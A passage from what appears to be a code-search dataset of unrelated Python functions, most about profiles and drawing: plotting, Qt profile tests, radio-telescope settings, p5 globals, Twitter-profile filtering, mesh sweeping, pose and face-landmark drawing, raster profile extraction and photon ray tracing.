[])[:]\n\tplotDict['analysis_modules'].insert(0, 'TGraphFromHistograms')\n\tplotDict['tgraph_strip_empty'] = 'any'\n\tplotDict['tgraph_y_nicks'] = plotDict['nicks'][:opt_n_length_max]\n\tplotDict['tgraph_x_nicks'] = plotDict['nicks'][opt_n_length_max:]\n\tplotDict['tgraph_result_nicks'] = ['%s_vs_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# disable source plots\n\tplotDict['nicks_blacklist'] = [r'^%s$' % nick for nick in plotDict['nicks']]\n\treturn plotDict", "def testMethodProfile2D(self):\n\n toolBar = self.plot.getProfileToolbar()\n\n toolBar.vLineAction.trigger()\n plot2D = self.plot.getPlotWidget().getWidgetHandle()\n pos1 = plot2D.width() * 0.5, plot2D.height() * 0.5\n self.mouseClick(plot2D, qt.Qt.LeftButton, pos=pos1)\n\n manager = toolBar.getProfileManager()\n roi = manager.getCurrentRoi()\n roi.setProfileMethod(\"mean\")\n roi.setProfileType(\"2D\")\n roi.setProfileLineWidth(3)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n # check 2D 'mean' profile\n profilePlot = roi.getProfileWindow().getCurrentPlotWidget()\n data = profilePlot.getAllImages()[0].getData()\n expected = numpy.array([[1, 4], [7, 10], [13, 16]])\n numpy.testing.assert_almost_equal(data, expected)", "def plot_profile(outdir, xval='x', xscale=1, yscale=1, comp2los=False, adjustRadial=False,\n fig=True):\n #Load data\n path = os.path.join(outdir,'points.h5')\n x,y,z,ux,uy,uz = pu.extract_points(path)\n\n Y = uz / yscale\n if xval == 'x':\n X = x / xscale\n Y1 = ux / yscale\n elif xval == 'r':\n X = np.hypot(x,y) / xscale\n ur = np.hypot(ux,uy)\n Y1 = ur / yscale\n if adjustRadial: #fix sign from hypot square root\n ur = pu.radial2negative(Y1)\n\n if fig:\n plt.figure()\n # otherwise profile added to active plot\n\n #plt.plot(X,uy/yscale,'r.-',label='Uy') #should be zero along EW axis\n de = 90e3 / xscale #eastern data extent\n if comp2los != False:\n data_extents = (X<=de)\n if comp2los == 'west': #switch sign of radial profile\n #ux = -ux #move to comp2los function\n X = -X\n Y1 = -Y1\n de = -de\n data_extents = (X>=de)\n\n los = pu.comp2los(x,ux,uy,uz,track=comp2los)\n plt.plot(X, los/yscale, 'k-', lw=2, label='Ulos_' + comp2los)\n plt.fill_between(X,los/yscale, where=data_extents, color='gray',alpha=0.5)\n\n plt.plot(X, Y, 'b-', lw=2, label='Uz')\n plt.plot(X, Y1, 'b--',lw=2, mfc='None',label='U{0}'.format(xval))\n\n # Annotate\n plt.title(outdir)\n plt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n plt.ylabel('Uz [{}]'.format(get_unit(yscale)))\n plt.axhline(color='k')\n plt.axvline(de,color='k', linestyle='dashed', label='EW data extent') #EW extent of InSAR coverage\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()", "def set_profile(self, profile='default'):\n\n # parameters used by various subclasses\n # each set is indexed by a name, called a profile\n # Note that each parameter must also be listed in set_params method in order to get set\n self.profile = profile\n self.params = {\n 'default' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [44.,88.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center (vla)\n 'lat': 34.07875 # latitude of the array center 
(vla)\n },\n 'vlacrab' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [29.,58.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center\n 'lat': 34.07875 # latitude of the array center\n },\n 'psa' : {\n 'chans': n.array(range(140,150)), # channels to read\n 'dmarr' : [0.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 21.411, # longitude of the array center\n 'lat': -30.721 # latitude of the array center\n },\n 'pocob0329' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [0, 13.4, 26.8, 40.2, 53.5], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.005, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -121.470, # longitude of the array center\n 'lat': 40.817 # latitude of the array center\n },\n 'mwa' : {\n 'chans': n.array(n.arange(128)), # channels to read\n 'dmarr' : [0, 50.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 116.671, # longitude of the array center\n 'lat': -26.703 # latitude of the array center\n }\n }\n\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def pre_draw(p5_instance, draw_func):\n global _CTX_MIDDLE, _DEFAULT_FILL, _DEFAULT_LEADMULT, _DEFAULT_STROKE, _DEFAULT_TEXT_FILL\n\n global ADD, ALT, ARROW, AUTO, AUDIO, AXES, BACKSPACE, BASELINE, BEVEL, BEZIER, BLEND, BLUR, BOLD, BOLDITALIC\n global BOTTOM, BURN, CENTER, CHORD, CLAMP, CLOSE, CONTROL, CORNER, CORNERS, CROSS, CURVE, DARKEST\n global DEG_TO_RAD, DEGREES, DELETE, DIFFERENCE, DILATE, DODGE, DOWN_ARROW, ENTER, ERODE, ESCAPE, EXCLUSION\n global FILL, GRAY, GRID, HALF_PI, HAND, HARD_LIGHT, HSB, HSL, IMAGE, IMMEDIATE, INVERT, ITALIC, LANDSCAPE\n global LEFT, LEFT_ARROW, LIGHTEST, LINE_LOOP, LINE_STRIP, LINEAR, LINES, MIRROR, MITER, MOVE, MULTIPLY, NEAREST\n global NORMAL, OPAQUE, OPEN, OPTION, OVERLAY, P2D, PI, PIE, POINTS, PORTRAIT, POSTERIZE, PROJECT, QUAD_STRIP, QUADRATIC\n global QUADS, QUARTER_PI, RAD_TO_DEG, RADIANS, RADIUS, 
REPEAT, REPLACE, RETURN, RGB, RIGHT, RIGHT_ARROW\n global ROUND, SCREEN, SHIFT, SOFT_LIGHT, SQUARE, STROKE, SUBTRACT, TAB, TAU, TEXT, TEXTURE, THRESHOLD, TOP\n global TRIANGLE_FAN, TRIANGLE_STRIP, TRIANGLES, TWO_PI, UP_ARROW, VIDEO, WAIT, WEBGL\n\n global frameCount, focused, displayWidth, displayHeight, windowWidth, windowHeight, width, height\n global disableFriendlyErrors, deviceOrientation, accelerationX, accelerationY, accelerationZ\n global pAccelerationX, pAccelerationY, pAccelerationZ, rotationX, rotationY, rotationZ\n global pRotationX, pRotationY, pRotationZ, turnAxis, keyIsPressed, key, keyCode, mouseX, mouseY, pmouseX, pmouseY\n global winMouseX, winMouseY, pwinMouseX, pwinMouseY, mouseButton, mouseIsPressed, touches, pixels\n\n _CTX_MIDDLE = p5_instance._CTX_MIDDLE\n _DEFAULT_FILL = p5_instance._DEFAULT_FILL\n _DEFAULT_LEADMULT = p5_instance._DEFAULT_LEADMULT\n _DEFAULT_STROKE = p5_instance._DEFAULT_STROKE\n _DEFAULT_TEXT_FILL = p5_instance._DEFAULT_TEXT_FILL\n\n ADD = p5_instance.ADD\n ALT = p5_instance.ALT\n ARROW = p5_instance.ARROW\n AUDIO = p5_instance.AUDIO\n AUTO = p5_instance.AUTO\n AXES = p5_instance.AXES\n BACKSPACE = p5_instance.BACKSPACE\n BASELINE = p5_instance.BASELINE\n BEVEL = p5_instance.BEVEL\n BEZIER = p5_instance.BEZIER\n BLEND = p5_instance.BLEND\n BLUR = p5_instance.BLUR\n BOLD = p5_instance.BOLD\n BOLDITALIC = p5_instance.BOLDITALIC\n BOTTOM = p5_instance.BOTTOM\n BURN = p5_instance.BURN\n CENTER = p5_instance.CENTER\n CHORD = p5_instance.CHORD\n CLAMP = p5_instance.CLAMP\n CLOSE = p5_instance.CLOSE\n CONTROL = p5_instance.CONTROL\n CORNER = p5_instance.CORNER\n CORNERS = p5_instance.CORNERS\n CROSS = p5_instance.CROSS\n CURVE = p5_instance.CURVE\n DARKEST = p5_instance.DARKEST\n DEG_TO_RAD = p5_instance.DEG_TO_RAD\n DEGREES = p5_instance.DEGREES\n DELETE = p5_instance.DELETE\n DIFFERENCE = p5_instance.DIFFERENCE\n DILATE = p5_instance.DILATE\n DODGE = p5_instance.DODGE\n DOWN_ARROW = p5_instance.DOWN_ARROW\n ENTER = p5_instance.ENTER\n ERODE = p5_instance.ERODE\n ESCAPE = p5_instance.ESCAPE\n EXCLUSION = p5_instance.EXCLUSION\n FILL = p5_instance.FILL\n GRAY = p5_instance.GRAY\n GRID = p5_instance.GRID\n HALF_PI = p5_instance.HALF_PI\n HAND = p5_instance.HAND\n HARD_LIGHT = p5_instance.HARD_LIGHT\n HSB = p5_instance.HSB\n HSL = p5_instance.HSL\n IMAGE = p5_instance.IMAGE\n IMMEDIATE = p5_instance.IMMEDIATE\n INVERT = p5_instance.INVERT\n ITALIC = p5_instance.ITALIC\n LANDSCAPE = p5_instance.LANDSCAPE\n LEFT = p5_instance.LEFT\n LEFT_ARROW = p5_instance.LEFT_ARROW\n LIGHTEST = p5_instance.LIGHTEST\n LINE_LOOP = p5_instance.LINE_LOOP\n LINE_STRIP = p5_instance.LINE_STRIP\n LINEAR = p5_instance.LINEAR\n LINES = p5_instance.LINES\n MIRROR = p5_instance.MIRROR\n MITER = p5_instance.MITER\n MOVE = p5_instance.MOVE\n MULTIPLY = p5_instance.MULTIPLY\n NEAREST = p5_instance.NEAREST\n NORMAL = p5_instance.NORMAL\n OPAQUE = p5_instance.OPAQUE\n OPEN = p5_instance.OPEN\n OPTION = p5_instance.OPTION\n OVERLAY = p5_instance.OVERLAY\n P2D = p5_instance.P2D\n P3D = p5_instance.WEBGL\n PI = p5_instance.PI\n PIE = p5_instance.PIE\n POINTS = p5_instance.POINTS\n PORTRAIT = p5_instance.PORTRAIT\n POSTERIZE = p5_instance.POSTERIZE\n PROJECT = p5_instance.PROJECT\n QUAD_STRIP = p5_instance.QUAD_STRIP\n QUADRATIC = p5_instance.QUADRATIC\n QUADS = p5_instance.QUADS\n QUARTER_PI = p5_instance.QUARTER_PI\n RAD_TO_DEG = p5_instance.RAD_TO_DEG\n RADIANS = p5_instance.RADIANS\n RADIUS = p5_instance.RADIUS\n REPEAT = p5_instance.REPEAT\n REPLACE = p5_instance.REPLACE\n RETURN = 
p5_instance.RETURN\n    RGB = p5_instance.RGB\n    RIGHT = p5_instance.RIGHT\n    RIGHT_ARROW = p5_instance.RIGHT_ARROW\n    ROUND = p5_instance.ROUND\n    SCREEN = p5_instance.SCREEN\n    SHIFT = p5_instance.SHIFT\n    SOFT_LIGHT = p5_instance.SOFT_LIGHT\n    SQUARE = p5_instance.SQUARE\n    STROKE = p5_instance.STROKE\n    SUBTRACT = p5_instance.SUBTRACT\n    TAB = p5_instance.TAB\n    TAU = p5_instance.TAU\n    TEXT = p5_instance.TEXT\n    TEXTURE = p5_instance.TEXTURE\n    THRESHOLD = p5_instance.THRESHOLD\n    TOP = p5_instance.TOP\n    TRIANGLE_FAN = p5_instance.TRIANGLE_FAN\n    TRIANGLE_STRIP = p5_instance.TRIANGLE_STRIP\n    TRIANGLES = p5_instance.TRIANGLES\n    TWO_PI = p5_instance.TWO_PI\n    UP_ARROW = p5_instance.UP_ARROW\n    VIDEO = p5_instance.VIDEO\n    WAIT = p5_instance.WAIT\n    WEBGL = p5_instance.WEBGL\n\n    frameCount = p5_instance.frameCount\n    focused = p5_instance.focused\n    displayWidth = p5_instance.displayWidth\n    displayHeight = p5_instance.displayHeight\n    windowWidth = p5_instance.windowWidth\n    windowHeight = p5_instance.windowHeight\n    width = p5_instance.width\n    height = p5_instance.height\n    disableFriendlyErrors = p5_instance.disableFriendlyErrors\n    deviceOrientation = p5_instance.deviceOrientation\n    accelerationX = p5_instance.accelerationX\n    accelerationY = p5_instance.accelerationY\n    accelerationZ = p5_instance.accelerationZ\n    pAccelerationX = p5_instance.pAccelerationX\n    pAccelerationY = p5_instance.pAccelerationY\n    pAccelerationZ = p5_instance.pAccelerationZ\n    rotationX = p5_instance.rotationX\n    rotationY = p5_instance.rotationY\n    rotationZ = p5_instance.rotationZ\n    pRotationX = p5_instance.pRotationX\n    pRotationY = p5_instance.pRotationY\n    pRotationZ = p5_instance.pRotationZ\n    turnAxis = p5_instance.turnAxis\n    keyIsPressed = p5_instance.keyIsPressed\n    key = p5_instance.key\n    keyCode = p5_instance.keyCode\n    mouseX = p5_instance.mouseX\n    mouseY = p5_instance.mouseY\n    pmouseX = p5_instance.pmouseX\n    pmouseY = p5_instance.pmouseY\n    winMouseX = p5_instance.winMouseX\n    winMouseY = p5_instance.winMouseY\n    pwinMouseX = p5_instance.pwinMouseX\n    pwinMouseY = p5_instance.pwinMouseY\n    mouseButton = p5_instance.mouseButton\n    mouseIsPressed = p5_instance.mouseIsPressed\n    touches = p5_instance.touches\n    pixels = p5_instance.pixels\n\n    return draw_func()", "def _should_profile(self) -> bool:\n        if \"profile\" in self._allowed_plugins:\n            if not self._one_shot:\n                raise ValueError(\n                    \"Profile plugin currently only supported for one shot.\"\n                )\n            logger.info(\"Profile plugin is enabled.\")\n            return True\n        return False", "def filterprofile(profile, settings):\n    \n    if settings.exclude is True and len(profile.description) == 0:\n        print(\"EMPTY BIO\")\n        return False\n\n    if profile.description is None:\n        return False\n\n    if len(settings.include_keywords) > 1 and not any(kw in profile.description for kw in settings.include_keywords.splitlines()):\n        print(\"NO KEYWORDS\")\n        return False\n\n    if profile.followers_count is None:\n        return False\n    \n    if profile.followers_count < settings.followers:\n        print(\"NUM FOLLOWERS\")\n        return False\n\n    if any(loc in profile.location for loc in settings.fromcountries.splitlines()):\n        print(\"LOCATION\")\n        return False\n\n    if profile.statuses_count < settings.tweets:\n        print(\"NUM TWEETS\")\n        return False\n\n    created = datetime.datetime.strptime(profile.created_at, \"%a %b %d %H:%M:%S %z %Y\")\n    months = relativedelta(datetime.datetime.now(datetime.timezone.utc), created).years * 12\n    if months == 0:\n        if (profile.statuses_count / 12) > settings.tweetsperyear:\n            print(\"TWEETS PER YEAR\")\n            return False\n    else:\n        if 
(profile.statuses_count / months / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n\n if profile.status is not None:\n lasttweetdate = datetime.datetime.strptime(profile.status.created_at, \"%a %b %d %H:%M:%S %z %Y\").replace(tzinfo=None)\n \n lasttweetmonths = relativedelta(datetime.datetime.now(), lasttweetdate).years * 12\n if lasttweetmonths > settings.notweetsfor:\n print(\"LAST TWEET\")\n return False\n else:\n return False\n # else\n return True", "def addProfile(self, profile, color=None, close=False):\n if close:\n e1 = profile[0] # should always be a point\n if e1[0] != 0.0:\n profile = [(0.0, e1[1])] + profile\n e2 = profile[-1]\n if e2[0] != 0.0:\n if len(e2) == 2:\n profile.append((0.0, e2[1]))\n else:\n # profile ends in an arc\n profile.append((0.0, e2[0][1]))\n # previous line start x/y, for line -> arc\n px1 = py1 = None\n for e1, e2 in windowItr(profile, 2, 1):\n if e2 is None:\n break\n le1 = len(e1)\n le2 = len(e2)\n # line or start -> line\n if le1 == 2 and le2 == 2:\n x1, y1 = e1\n x2, y2 = e2\n self.blendTangent(False)\n patch = Patch.fromRevLineSeg(x1, y1, x2, y2, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = x1\n py1 = y1\n # line or start -> arc\n elif le1 == 2 and le2 == 3:\n x1, y1 = e1\n (x2, y2), (cx, cy), d = e2\n if px1 is not None:\n self.blendTangent(self._isLineTanToArc(px1, py1, x1, y1,\n cx, cy, d))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx, cy, d, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n # arc -> line\n elif le1 == 3 and le2 == 2:\n (aex, aey), (cx, cy), d = e1\n lex, ley = e2\n self.blendTangent(self._isLineTanToArc(lex, ley, aex, aey, cx,\n cy, d))\n patch = Patch.fromRevLineSeg(aex, aey, lex, ley, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = aex\n py1 = aey\n # arc -> arc\n else:\n (x1, y1), (cx1, cy1), d1 = e1\n (x2, y2), (cx2, cy2), d2 = e2\n self.blendTangent(self._isArcTangentToArc(x1, y1, cx1, cy1,\n cx2, cy2))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx2, cy2, d2,\n self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n self._bbox = BBox.fromVertices(self._sharedVertices)", "def profile(x):\n return x", "def __init__(self, profile: prof.Profile) -> None:\n logger.debug('merge filter initialize')\n self._profile = profile", "def profile(self, profile):\n\n self.width = profile['width']\n self.height = profile['height']\n self.crs = profile['crs']\n self.interleave = profile['interleave']\n self.resampling = profile['resampling']", "def draw(img, p):\n\t\t\n\t########### First of all we gotta define which point connects together, there are points for the head(5), the shoulders, elbows, hands, top of thighs, knees, feet\n\t########### top of thighs, knees and feet. 
We also gonna add 2 extra points for the neck and the pelvis, to make everything look better.\n\t########### We also provide the color of each line here\n\tconnexions = [\t\n\t\t\t\t\t(5, 7, 'navy'),\t\t# shoulder => elbow\n\t\t\t\t\t(7, 9, 'navy'),\t\t# elbow => hand\n\t\t\t\t\t(6, 8, 'navy'),\t\t# same on the other side\n\t\t\t\t\t(8, 10, 'navy'),\n\t\t\t\t\t(11, 13, 'lime'),\t# thigh => knee\n\t\t\t\t\t(13, 15, 'lime'),\t# knee => foot\n\t\t\t\t\t(12, 14, 'lime'),\t# same on the other side\n\t\t\t\t\t(14, 16, 'lime'),\n\n\t\t\t\t\t###### With The Extra points :\n\n\t\t\t\t\t(0, 17, 'aqua'),\t# head => neck\n\t\t\t\t\t(17, 5, 'aqua'),\t# neck => shoulders\n\t\t\t\t\t(17, 6, 'aqua'),\n\t\t\t\t\t(17, 18, 'teal'),\t# neck => pelvis\n\t\t\t\t\t(18, 11, 'teal'),\t# pelvis => thighs\n\t\t\t\t\t(18, 12, 'teal')\n\t\t\t\t\t]\n\n\t###### now let's find out how many objects were detected \n\t\n\tl = len(p[0][\"scores\"])\n\n\t##### time to draw now, we'll only select objects with a score over .9\n\n\td = idw.Draw(img)\n\n\tfor k in range(l):\n\n\t\tif p[0][\"scores\"][k] > 0.98:\n\n\t\t\t##### Let's add the neck and pelvis:\n\t\t\tneck = (p[0][\"keypoints\"][k][5] + p[0][\"keypoints\"][k][6])/2\n\t\t\tpelv = (p[0][\"keypoints\"][k][11] + p[0][\"keypoints\"][k][12])/2\n\n\t\t\t#### it's getting tricky here\n\n\t\t\tnepe = t.zeros((2, 3))\n\t\t\tnepe[0] = neck ; nepe[1] = pelv \n\n\t\t\t### Now let's put everything into a single tensor\n\t\t\tbody = t.cat((p[0][\"keypoints\"][k], nepe))\n\n\t\t\t#### We can start drawing now, for real\n\n\t\t\tfor tp in connexions:\n\n\t\t\t\tp0 = (int(body[tp[0], 0]), int(body[tp[0], 1]))\n\t\t\t\tp1 = (int(body[tp[1], 0]), int(body[tp[1], 1]))\n\t\t\t\td.line([p0, p1], fill=tp[2], width=2)\n\n\t\t\t#### Now the points\n\n\t\t\tfor ts in t.cat((body[0:1], body[5:])):\n\t\t\t\td.ellipse((int(ts[0]-2), int(ts[1]-2), int(ts[0]+2), int(ts[1]+2)), 'fuchsia')\n\n\t### and finally\n\t#plt.imshow(np.asarray(img)) Not Like That\n\timg.show()", "def sweep(profile,n,capped=False):\n    assert n > 2 and isinstance(n,int)\n    profile = openPoly(profile)\n    t = yRot(360/n)\n    result = Mesh()\n\n    if capped:\n        first = profile[0]\n        firstOnY = [0,first[1],0]\n        if not near(first,firstOnY):\n            print(\"adding bottom cap\")\n            cap = []\n            for i in range(n):\n                cap.append(first)\n                first = t(first)\n            result.addPoly(cap)\n\n        last = profile[-1]\n        lastOnY = [0,last[1],0]\n        if not near(last,lastOnY):\n            print(\"adding top cap.\")\n            cap = []\n            for i in range(n):\n                cap.append(last)\n                last = t(last)\n            result.addPoly(cap[::-1])\n\n    for i in range(n):\n        newProfile = t(profile)\n        for ((p0,p1),(q0,q1)) in zip(edges(profile),edges(newProfile)):\n            if near(p0,q0): # when p0 near y axis\n                if not near(p1,q1):\n                    result.addTri([p0,p1,q1])\n            elif near(p1,q1): # when p1 near y axis\n                result.addTri([p0,p1,q0])\n            else:\n                result.addTri([p0,p1,q0])\n                result.addTri([p1,q1,q0])\n        profile = newProfile\n    return result", "def draw_points(self, pic_path, points_data):\n        # Pupil Finding here\n        pupils = get_eye_locations_in_image(pic_path)\n        img = cv2.imread(pic_path)\n        frame_number = int(re.findall(r'\\d+', pic_path.split('/')[-1])[0])\n        dets = detector(img)\n        shape = None\n        height, width, channels = img.shape\n\n        for k, d in enumerate(dets):\n            shape = predictor(img, d)\n\n        if(not shape):\n            return\n\n        pointList = []\n        c = 0\n        for b in range(68):\n            # sanitizing input points\n            point = Point(shape.part(b).x, shape.part(b).y)\n            points_data[c] = [point.x, point.y]\n            c = c + 1\n            # some points might be out of bound\n            # so, move them to 
the closest boundary\n if(point.x < 0):\n point.x = 0\n elif(point.x >= width):\n point.x = width - 1\n if(point.y < 0):\n point.y = 0\n elif(point.y >= height):\n point.y = height - 1\n\n pointList.append(point)\n\n roll = findRoll(pointList)\n #print(\"roll is \" + str(roll) + ' angles')\n yaw = findYaw(pointList)\n #print(\"yaw is \" + str(yaw) + ' angles')\n pitch = findPitch(pointList)\n #print(\"pitch is \" + str(pitch) + ' angles')\n self.data[frame_number] = [roll, yaw, pitch]\n counter = 0\n for point in pointList:\n cv2.circle(img, (point.x, point.y), ImageProcessor.POINT_SIZE, ImageProcessor.POINT_COLOR, -1)\n counter = counter + 1\n\n self.draw_triangles(img, pointList)\n \n for pupil in pupils:\n cv2.circle(img, (pupil.left.x, pupil.left.y), 5, (0,0,255), -1)\n cv2.circle(img, (pupil.right.x, pupil.right.y), 5, (0,0,255), -1)\n points_data[-1] = [pupil.left.x, pupil.left.y]\n points_data[-2] = [pupil.right.x, pupil.right.y]\n #print(pupil.left.x, \", \", pupil.left.y)\n #print(pupil.right.x, \", \", pupil.right.y)\n\n cv2.imwrite(pic_path, img)", "def extract_profile(tif, line_file, ds):\r\n\r\n import numpy as np\r\n import gdal\r\n import fiona\r\n from scipy.interpolate import interp1d\r\n# from scipy.interpolate import interp2d\r\n from scipy.ndimage import map_coordinates\r\n \r\n #%% Create evenly spaced points\r\n # Read coordinates of the profile line from shapefile\r\n fiona_obj = fiona.open(line_file)\r\n# line = fiona_obj.next()\r\n line = iter(fiona_obj).next() # this line is proper syntax for fiona v2. Corrected on Mar 12, 2021 by TCB\r\n coords = np.array( line['geometry']['coordinates'] ) # m the easting and northing coordinates of the vertices along the shapefile\r\n \r\n sqrd_deltas = np.diff(coords, axis=0)**2 # squared differences between x and y coordinates\r\n deltas = np.sum(sqrd_deltas, axis=1)**0.5 # m straight-line path length between adjacent points in the shapefile\r\n dist = np.cumsum( np.append(0, deltas) ) # m running distance along the shapefile from one end.\r\n \r\n disti = np.arange(dist[0], dist[-1], ds) # m vector of evenly spaced distances along the shapefile,\r\n # equivalent to an evenly spaced version of dist\r\n xi = interp1d(dist, coords[:,0])(disti) # m the easting coordinates of disti points, at which profile will be extracted\r\n yi = interp1d(dist, coords[:,1])(disti) # m the northing coordinates of disti points, at which profile will be extracted\r\n\r\n #%% Manipulate the raster and extract its data\r\n # ---- dimensions of geotiff\r\n gtif = gdal.Open(tif)\r\n xmin,xres,xskew,ymax,yskew,yres = gtif.GetGeoTransform()\r\n\r\n\r\n # convert the profile coordinates into pixel coordinates\r\n px = (xi - xmin) / xres\r\n py = (yi - ymax) / yres\r\n# px = np.round(col).astype(int)\r\n# py = np.round(row).astype(int)\r\n \r\n \r\n # pull out the array of raster data. 
Data are assumed to be in band 1.\r\n    gtif_data = gtif.GetRasterBand(1).ReadAsArray()\r\n#    gtif_data = band.ReadAsArray()px,py, 1, 1)\r\n    \r\n    # Two early versions of extracting the data:\r\n    # profile = map_coordinates(gtif_data,[px,py],order=0,cval=np.nan)\r\n    # profile = interp2d(np.arange(gtif_data.shape[1]), np.arange(gtif_data.shape[0]), \r\n    #                      gtif_data)(px, py)\r\n\r\n    # Interpolate within gtif_data at given pixel coordinates to identify values from the geotiff \r\n    # Uses a 1st order spline interpolant to extract estimated values of\r\n    # gtif_data at the (non-integer) pixel values px and py.\r\n    # Function returns `cval' at undefined values of gtif_data.\r\n    profile = map_coordinates(gtif_data, np.vstack((py, px)),\r\n                              order=1, cval=np.nan)\r\n    \r\n#    profile = np.array(profile,dtype=float)\r\n    if type(profile[0]) == float:\r\n        profile[np.abs(profile) == 9999] = np.nan\r\n    \r\n    return disti, profile", "def start_if_active(self,\n                       profile_id=None):\n        profiler = None\n\n        if self._active(profile_id):\n            # Enable the profiler\n            profiler = cProfile.Profile()\n            profiler.enable()\n\n        return profiler", "def _analyze(self, original_frame, landmarks, side, calibration):\n        if side == 0:\n            points = self.LEFT_EYE_POINTS\n        elif side == 1:\n            points = self.RIGHT_EYE_POINTS\n        else:\n            return\n        self.blinking = self._blinking_ratio(landmarks, points)\n        self._isolate(original_frame, landmarks, points)\n        if not calibration.is_complete():\n            calibration.evaluate(self.frame, side)\n        threshold = calibration.threshold(side)\n        self.pupil = Pupil(self.frame, threshold)", "def trace(self):\n\n        \n        assert self.scene != None, \"The photon's scene variable is not set.\"\n        \n        intersection_points, intersection_objects = self.scene.intersection(self.ray)\n\n        \"\"\"\n        #DIAGNOSTICS\n        print \"\\nnew\\n\"\n        print self.position, self.direction, \"\\n\"\n        print intersection_points, \"\\n\"\n        for i in range(0, len(intersection_objects)):\n            print \"Object: \", intersection_objects[i].name, \" - Intersection: \", intersection_points[i]\n        \"\"\"\n        \n        assert intersection_points != None, \"The ray must intersect with something in the scene to be traced.\"\n        \n        if self.container is None:\n            self.container = self.scene.container(self)\n        assert self.container != None, \"Container of ray cannot be found.\"\n        \n        #import pdb; pdb.set_trace()\n        #import pudb; pudb.set_trace()\n        intersection_points, intersection_objects = Scene.sort(intersection_points, intersection_objects, self, container=self.container, show_log=self.show_log)\n        \n        # find current intersection point and object -- should be zero if the list is sorted!\n        intersection = closest_point(self.position, intersection_points)\n        for i in range(0,len(intersection_points)):\n            if list(intersection_points[i]) == list(intersection):\n                index = i\n                break\n        \n        #import pdb; pdb.set_trace()\n        intersection_object = intersection_objects[index]\n        assert intersection_object != None, \"No intersection points can be found with the scene.\"\n        \n        \n        \"\"\"\n        #DIAGNOSTICS\n        print \"\\n\", intersection, \"\\n\"\n        print intersection_object.name  \n        \"\"\"  \n        \n        \n        # Reached scene boundaries?\n        if intersection_object is self.scene.bounds:\n            self.active = False\n            self.previous_container = self.container\n            self.container = self.scene.bounds\n            return self\n\n\n        # Reached a RayBin (kind of perfect absorber)?\n        if isinstance(intersection_object, RayBin):\n            self.active = False\n            self.previous_container = self.container\n            self.container = self.scene.bounds\n            return self\n        \n        \n        # Here we trace the ray through a 
Coating\n if isinstance(self.container, Coating):\n normal = intersection_object.shape.surface_normal(self.ray)\n self = self.container.material.trace(self, normal, separation(self.position, intersection))\n self.exit_device = self.container\n self.previous_container = self.container\n self.container = self.scene.container(self)\n return self\n \n \n # Here we determine if the Coating has been hit\n if isinstance(intersection_object, Coating) and intersection_object.shape.on_surface(self.position):\n self.previous_container = self.container\n self.container = intersection_object\n self.exit_device = intersection_object\n assert self.exit_device != self.scene.bounds, \"The object the ray hit before hitting the bounds is the bounds, this can't be right.\"\n return self\n \n \n # Here we trace the ray through a Material\n self = self.container.material.trace(self, separation(self.position, intersection))\n \n \n # Lost in material?\n # Photon has been re-absorbed but NOT re-emitted, i.e. is inactive\n if not self.active:\n #01/04/10: Unification --> Next two lines came from older Trace version\n self.exit_device = self.container\n self.exit_material = self.container.material\n return self \n \n # Reaches interface\n # Photon has been re-absorbed AND re-emitted, i.e. is still active\n ray_on_surface = intersection_object.shape.on_surface(self.position)\n if not ray_on_surface: \n self.exit_device = self.container\n return self\n \n # Ray has reached a surface of some description, increment the intersection counter\n self.intersection_counter += 1\n \n # If we reach an reflective material then we don't need to follow \n # this logic we can just return\n if ray_on_surface and isinstance(intersection_object, Coating):\n self.previous_container = self.container\n self.container = intersection_object\n self.exit_device = intersection_object\n return self\n \n # KARLG NEW CODE HERE\n #import pudb; pudb.set_trace()\n if isinstance(intersection_object, Face):\n self.exit_device = intersection_object\n \n # Now change the properties of the photon accoring to what your surface does\n random_number = np.random.random_sample()\n if random_number < intersection_object.reflectivity:\n # Reflected\n self.direction = reflect_vector(intersection_object.shape.surface_normal(self.ray), self.direction)\n elif random_number < intersection_object.reflectivity + intersection_object.transmittance:\n # 